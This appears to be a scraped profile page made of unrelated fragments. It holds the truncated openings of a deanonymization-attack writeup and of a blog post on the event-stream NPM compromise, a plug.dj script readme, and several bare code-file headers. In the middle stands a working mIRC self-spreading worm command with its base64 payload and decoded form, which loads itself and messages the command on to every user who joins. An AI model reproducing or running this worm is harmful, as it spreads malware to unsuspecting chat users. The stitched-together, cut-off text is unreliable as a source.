Henrique Campos henry701

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

To Catch a Hacker - NPM Event Stream

(Note: this post is from a legacy blog dated 12/14/2018 and some content or links may have changed)

A few weeks ago, this issue was opened on a popular Node NPM package called Event Stream. This package enables Node streams to be simpler and streamlines many I/O operations within Node. Regardless, this package is a key dependency for many other Node packages and has over 1 million downloads per week from NPM. The newly opened issue initially questioned a new, suspicious dependency that was pushed by a new, unknown maintainer. I was lucky enough to follow the community's investigation into this issue and now, I hope to present the findings here. My goal with this piece is to hopefully shed some light on how easy it is for somebody to inject malicious code into NPM packages, the responsibility of open source maintainers, and the responsibility of the community.

The Malicious Code

A Github user noticed that

What is this?

It's a script (think of it as mod) for plug.dj which will allow you to add YT (YouTube) videos to your playlists with one button.

Why is this necessary?

Plug.dj is having some trouble with their YT API Key (the thing that allows you to make YT related actions throughout the site, like searching for a song and adding the results to your playlists). Using this script, you will be able to add YT videos to your playlists again, even while plug.dj is dealing with YouTube's support to get this issue fixed.

	You get this

	STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) \| .load -rs nospam \| //mode $me +R

	The encoded part decodes to this

	on !+1:join:#:{ .auser 2 $nick \| .msg $nick STOP SPAM, USE THIS COMMAND:4 //write nospam $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs nospam $chr(124) //mode $ $+ me +R } }

	And starts spreading to other people

	using System.Collections;
	using System.Reflection;
	using System.IO;
	using IKVM.Internal;
	using java.lang;
	using java.util.zip;
	using java.io;
	using jessielesbian.IKVM;
	using Console = System.Console;
	using File = java.io.File;

	[*]
	charset = utf-8
	end_of_line = lf
	indent_size = 2
	indent_style = space
	insert_final_newline = false
	max_line_length = 100
	tab_width = 2
	ij_continuation_indent_size = 4
	ij_formatter_off_tag = @formatter:off

	import binascii
	import pefile
	import subprocess
	import sys
	import os


	ror = lambda val, r_bits, max_bits: \
	((val & (2**max_bits-1)) >> r_bits%max_bits) \| \
	(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

	using System;
	using System.Globalization;
	using System.Net;
	using System.Net.Sockets;
	using System.Text;
	using System.Threading.Tasks;

	namespace Socks
	{
	public static class Socks5